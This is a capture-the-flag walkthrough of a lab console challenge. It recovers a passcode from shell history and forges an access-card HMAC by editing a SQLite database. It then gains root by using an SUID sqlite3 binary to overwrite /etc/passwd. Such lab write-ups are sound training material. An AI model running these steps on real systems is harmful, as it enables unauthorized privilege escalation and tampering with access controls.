This is the second part from objective Hardware Hacking 101
Hidden in Plain Sight Hints: It is so important to keep sensitive data like passwords secure. Often times, when typing passwords into a CLI (Command Line Interface) they get added to log files and other easy to access locations. It makes it trivial to step back in history and identify the password.
We boot the system (‘Startup system default’). First, let's take a look at the command line history:
slh@slhconsole\> history
1 cd /var/www/html
...
10 slg --config
11 slh --passcode CandyCaneCrunch77 --set-access 1 --id 143
We can also use the password from that previous session:
slh@slhconsole\> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42
...
Card 42 granted access level 1.
There’s a tougher route if you're up for the challenge to earn the Gold medal. It involves directly modifying the database and generating your own HMAC signature.
It's In the Signature Hints: I seem to remember there being a handy HMAC generator included in CyberChef.
We find the SQLite database in the file system and take a closer look at it:
slh@slhconsole\> ls
access_cards
slh@slhconsole\> file access_cards
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 8, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 8
slh@slhconsole\> sqlite3 access_cards
sqlite> .header on
sqlite> .tables
access_cards config
sqlite> select * from config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0
sqlite> select * from access_cards where id=42;
id|uuid|access|sig
42|c06018b6-5e80-4395-ab71-ae5124560189|0|ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd
An HMAC (hash-based message authentication code) involves a cryptographic hash function and a secret cryptographic key. It can be used to verify both the data integrity and authenticity of data.
If we use the value from hmac_secret as the key and enter the message with the format {access}{uuid} (without brackets), we can use CyberChef to create a valid signature.
sqlite> update access_cards set access=1, sig='135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096' where id = 42;
Brilliant work! We now have access to… the Wish List! I couldn't have done it without you—thank you so much!
I found a way to completely root the machine. This is based on sqlite SUID root being installed, see gtfobins. We use the built-in function to write files and overwrite /etc/passwd to gain root access.
slh@slhconsole\> LFILE=/etc/passwd
slh@slhconsole\> sqlite3 /dev/null -cmd ".output $LFILE" 'select "user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash";'
slh@slhconsole\> su user3
(password: 123)
Password:
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
user3@1a0597267c1e:/home/slh# id -a
uid=0(user3) gid=0(root) groups=0(root)
user3@1a0597267c1e:/home/slh#